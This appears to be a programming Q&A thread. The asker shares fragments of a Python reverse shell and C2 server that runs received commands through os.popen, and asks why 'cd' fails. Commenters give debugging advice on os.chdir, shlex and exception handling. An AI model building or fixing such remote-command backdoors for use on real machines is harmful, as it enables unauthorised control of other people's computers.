# Unable to execute cd command in reverse shell

Tags: python, shell, reverse

I created a reverse shell and i have multiple clients connected to my C2 server, I am able to run few commands yet I can't change directories for some reason, it only returns OK or nothing.
I'm not so sure what I'm doing wrong.

```
# Send commands to client or a friend
def send_target_commands(conn):
    while True:
        try:
            cmd = input()
            if cmd == 'quit':
                break
            if cmd == 'exit':
                break
            if len(str.encode(cmd)) > 0:
                conn.send(str.encode(cmd))
                client_response = str(conn.recv(20480), "utf-8")
                print(client_response, end="")
        except:
            print("Error sending commands")
            break
    while True:
        cmd = s.recv(20480)
        if cmd[:2] == "cd":
            os.chdir(str(cmd[3:]))
        else:
            o = os.popen(cmd).read()
            s.send(o)
```

This is what I get in the output:

[image]

this is my code in the client.py file which returns the OK message

```
#if the command has no output, send 'OK' so the server knows everything is okay
if len(result) == 0:
   result = 'OK' .encode()
#send the result to the server
s.send(result)
```

Comment: `~` is not _expected_ to work for `os.chdir()` unless you run it through `os.path.expanduser()` first.

Comment: BTW, you haven't shown us the code that prints `OK`, or whatever code is responsible for exception handling. A [mre] needs to be complete enough to _actually reproduce the problem_ for a question to be answerable.

Comment: apologies, i'm still learning how to post my questions properly here, i'll edit it and add the part of the code

Comment: Another hint -- for debug logging, it's helpful to print the `repr()`esentation of strings so you can see things like hidden characters.

Comment: Also, you should probably expect a prefix of `'cd '`, not just `'cd'`. Really, it's probably better to use something like [`shlex.split()`](https://docs.python.org/3/library/shlex.html#shlex.split) to break your string into words; that'll also make it easier to get rid of `os.popen()` and replace it with proper `subprocess` use with `shell=False`.

Comment: i just edited the question thank you for all your help

Comment: Code should be provided _as text_, not images. See [Why not upload images of code or errors when asking questions?](https://meta.stackoverflow.com/a/285557/14122) on [meta].

Comment: (also, just adding the "OK" isn't enough; what I was really trying to get at is that we don't have _enough to see the problem ourselves_; in an ideal world, you'd be able to isolate the issue enough to take out the client/server networking code altogether and just reproduce the individual failing call)

Comment: In particular -- how are you handling exceptions? `os.chdir('~')` throws an exception; for your server to keep running, that exception needs to be getting caught somewhere. Making that exception-handling code log your errors is the fastest route to being ale to diagnose the problem.

Comment: makes sense, i apologize for adding an Image, i'll fix that too, and honestly this is a project i've never done before so it's kind of hard to even explain the problem properly, apologies. i'll keep working on it and also read more in the OS module and shlex.split() hopefully it'll enlighten me more. thank you so much for all the help and advices.